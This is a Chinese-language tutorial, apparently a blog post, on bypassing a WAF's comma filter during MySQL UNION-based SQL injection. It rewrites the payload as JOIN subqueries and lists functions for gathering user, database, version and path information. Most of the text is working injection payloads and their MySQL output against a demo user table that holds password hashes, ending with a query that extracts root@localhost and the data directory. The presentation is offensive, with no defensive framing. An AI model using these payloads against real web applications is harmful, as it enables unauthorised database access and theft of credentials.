在SQL注入时,在确定了注入点后,一般都需要使用联合查询猜表的列数,也就是常见的order by n,n从大到小,直到返回正常,就确定了当前查询的列的个数。
然后再使用 UNION SELECT 1,2,3,4,5,6,7..n 这样的格式爆显示位,然后再 UNION SELECT 1,2,3,4,database(),6,7..n ,这是一个常规流程,语句中包含了多个逗号。
但是如果有WAF拦截了逗号时,我们的联合查询就被拦截了。
如果想绕过,就需要使用 Join 方法绕过。join的介绍看我的另一篇文章。
其实就简单的几句,在显示位上替换为常见的注入变量或其它语句:
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
常用数据库变量:
User() 查看用户
database() --查看数据库名称
Version() --查看数据库版本
@@datadir --数据库路径
@@version_compile_os--操作系统版本
system_user() --系统用户名
current_user()--当前用户名
session_user()--连接数据库的用户名
举例:
1. 假设我有一个表user,有5个列(字段),2行记录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
|
mysql> show tables;
+
--------------------------+
| Tables_in_gogs |
+
--------------------------+
|
user
|
| version |
+
--------------------------+
2
rows
in
set
(0.00 sec)
mysql>
desc
user
;
+
----------------------+---------------+------+-----+---------+----------------+
| Field | Type |
Null
|
Key
|
Default
| Extra |
+
----------------------+---------------+------+-----+---------+----------------+
| id |
bigint
(20) |
NO
| PRI |
NULL
| auto_increment |
|
name
|
varchar
(255) |
NO
| UNI |
NULL
| |
| email |
varchar
(255) |
NO
| |
NULL
| |
| passwd |
varchar
(255) |
NO
| |
NULL
| |
| salt |
varchar
(10) |
NO
| |
NULL
| |
+
----------------------+---------------+------+-----+---------+----------------+
5
rows
in
set
(0.01 sec)
mysql>
select
id,
name
,email,passwd
from
user
;
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id |
name
| email | passwd |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
2
rows
in
set
(0.00 sec)
|
2. UNION开头的是我们在URL中注入的语句,这里只是演示,在实际中如果我们在注入语句中有逗号就可能被拦截。
1
2
3
4
5
6
7
8
9
|
mysql>
select
id,
name
,email,passwd
from
user
union
select
1,2,3,4;
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id |
name
| email | passwd |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3
rows
in
set
(0.00 sec)
|
3. 不出现逗号,使用Join来继续注入
1
2
3
4
5
6
7
8
9
|
mysql>
select
id,
name
,email,passwd
from
user
union
select
*
from
((
select
1)A
join
(
select
2)B
join
(
select
3)C
join
(
select
4)D);
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id |
name
| email | passwd |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | 4 |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3
rows
in
set
(0.00 sec)
|
4. 绕过之后就可以替换显示的数字位继续注入获取数据库及系统信息
1
2
3
4
5
6
7
8
9
|
mysql>
select
id,
name
,email,passwd
from
user
union
select
*
from
((
select
1)A
join
(
select
2)B
join
(
select
3)C
join
(
select
group_concat(
user
(),
' '
,
database
(),
' '
,@@datadir))D);
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| id |
name
| email | passwd |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
| 1 | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2 | ihoney | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1 | 2 | 3 | root@localhost gogs /var/lib/mysql/ |
+
----+-----------+------------------+------------------------------------------------------------------------------------------------------+
3
rows
in
set
(0.00 sec)
|